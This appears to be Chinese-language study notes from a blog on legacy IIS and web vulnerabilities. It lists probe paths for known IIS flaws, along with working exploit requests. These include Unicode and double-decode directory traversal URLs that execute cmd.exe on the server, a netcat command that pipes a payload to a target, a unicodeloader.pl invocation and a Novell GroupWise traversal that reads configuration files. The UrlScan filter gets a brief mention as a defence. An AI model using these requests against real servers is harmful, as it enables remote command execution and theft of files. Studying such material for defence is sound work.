WEB應用的一些漏洞

通過netcat進行管道傳輸,連接到一個脆弱的服務器上

Netcat –vv 網站< htr.txt

URLSCan 一個模板驅動的過濾器,向IIS解析請求

分爲兩種文件

分別是UrlScan.dllUrlScan.iniUrlScan.ini爲配置文件,

向被拒絕的請求發送http404,目標未發現

阻止***者獲取任何一點有關目標服務器的信息

 

+.htr源代碼泄露,MS01004/default.asp+.htr

Web目錄路徑泄露 /null.idc

服務器端包含緩衝區溢出/file.stm,.shtm,shtml

.printer緩衝區溢出MS01023/null.printer

索引服務器緩衝區溢出/null.ida,idq

Webhits源泄露MS00006 /null.htw

Frontpage服務器擴展緩衝區溢出 MS01035/_vti_bin/_vti_aut/fp3Oreg.dll

 

 

IIS目錄遍歷的脆弱點分別是Unicodedouble decode***

討論一些達到初始訪問目的的機制,他們可以征服整個系統

GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0

http://網站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

 

使用軟件unicodeloader.pl

 

unicodeloader.pl  網站:80 C\inetpub\scripts

 

Novell GroupWise任意文件的訪問

http//網站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00

 

這種***的另一個後果是:即使運行了生產商的補丁,novell安裝的路徑也會被暴露,同時會***者可能會窺視WEBacess目錄中的commgrCfgldap.cfg文件中的敏感信息


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章